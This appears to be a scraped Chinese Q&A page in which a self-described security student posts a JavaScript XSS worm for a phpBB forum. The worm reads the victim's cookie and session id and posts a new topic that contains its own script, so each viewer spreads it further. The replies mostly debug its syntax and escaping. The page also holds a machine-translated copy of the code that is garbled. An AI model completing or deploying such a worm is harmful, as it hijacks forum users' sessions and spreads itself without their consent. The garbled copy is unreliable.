javascript中的自传播蠕虫_Javascript

javascript中的自传播蠕虫

javascript

javascript中的自传播蠕虫,javascript,Javascript,我正在努力学习更多关于互联网安全的知识，在这样做的过程中，我编写了一个自传播蠕虫（用于未初始化的输入）。这是我到目前为止的剧本 <script id=worm> var wormstr="<script>"; wormstr.concat(document.getElemntByID("worm").innerHTML); wormstr.concat("</scr"); wormstr.concat("ipt>"); var Ajax=null; A

我正在努力学习更多关于互联网安全的知识，在这样做的过程中，我编写了一个自传播蠕虫（用于未初始化的输入）。这是我到目前为止的剧本

<script id=worm>
var wormstr="<script>";
wormstr.concat(document.getElemntByID("worm").innerHTML);
wormstr.concat("</scr");
wormstr.concat("ipt>");
var Ajax=null;    
Ajax=new XMLHttpRequest();
Ajax.open("POST", "http://www.xssphpbb.com/posting.php", true);
Ajax.setRequestHeader("Host","www.sxxphpbb.com");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie", document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var sid=document.cookie.match('sid=([^;]*)')[1];

var content="subject=XSS&addbbcode18=%23444444&addbbcode20=0&helpbox=Tip%3A+Styles+can+be+applied+quickly+to+selected+text.&message=";
content=content.concat(wormstr);
content=content.concat("&add_poll_option_text=&poll_length=&mode=newtopic&sid="+sid+"&f=1&post=Submit");
alert(content); //for debugging

Ajax.send(content);
</script>


var wormstr=“”；
wormstr.concat（document.getElemntByID（“worm”）.innerHTML）；
蜗牛壳（“”）；
var Ajax=null；
Ajax=新的XMLHttpRequest（）；
打开（“POST”http://www.xssphpbb.com/posting.php“，对）；
setRequestHeader（“主机”，“www.sxxphpbb.com”）；
setRequestHeader（“连接”，“保持活动”）；
setRequestHeader（“Cookie”，document.Cookie）；
setRequestHeader（“内容类型”、“应用程序/x-www-form-urlencoded”）；
var sid=document.cookie.match（'sid=（[^；]*））[1]；
var content=“subject=XSS&addbbcode18=%2344444&addbbcode20=0&helpbox=Tip%3A+style+can+be+applicated+fast+to+selected+text&message=”；
content=content.concat（wormstr）；
content=content.concat（&add_poll_option_text=&poll_length=&mode=newtopic&sid=“+sid+”&f=1&post=Submit”）；
警报（内容）//用于调试
发送（内容）；

当我在服务器上的注释部分中运行此代码时，它会创建一条新注释，但该注释只是

“content=content.concat（wormstr）；content=content.concat（

假设此代码创建一条新评论并将其自身作为脚本插入该评论中。因此，如果有人访问原始帖子，他们将创建一条新的相同评论。如果有人访问其中一条生成的帖子，它将充当原始帖子，并使用此脚本创建一条新评论。

wormstr.concat（“ipt”）；

似乎缺少结束语

？，导致下一行出现语法错误

当我在服务器上的注释部分中运行此代码时创建新的注释，但该注释只是

“content=content.concat（wormstr）；content=content.concat（“

@虫族们，请投票否决这个问题，因为这个问题是非法的，开发者在任何时候都不应该做坏事！你的“问题”没有任何问题。也没有你的评论。成为安全专家的第一步是学习如何提出可回答的问题。这并不违法。我正在上互联网安全课程，试图学习安全如何工作以及如何编写安全协议。知识不是illegal@JamesNotaro，你只有11个代表，问了这样的问题，太可疑了！我不确定这怎么不是一个问题。当我将脚本插入服务器上的注释时，它会创建一个新的注释，注释末尾只有最后一段代码。没有未匹配的引号或缺少的标记，我尽可能使用正确的innerHTML。我会问我缺少脚本的哪一部分，因为我读过的文档中有l个指向此代码工作。我打错了，当我的代码从运行它的虚拟机转移过来时。原来的问题已经解决了。@JamesNotaro可能出现语法错误，以字符串形式转义字符。

的用途是什么

在

text.&message=

？这只是网站显示的句子末尾的一个句点。帮助框字段=Tip 3A styles可以快速应用于所选文本。尝试时没有句点，以便进行有效测量，行为没有变化或继续调试语法错误，可能添加

“\”

在关闭

/script

之前

wormstr.concat（document.getElemntByID（“worm”）.innerHTML）；

不会转义

文档返回的双引号。getElemntByID（“worm”）.innerHTML将使用转义（wormstr.concat（……）.innerHTML）；处理此问题。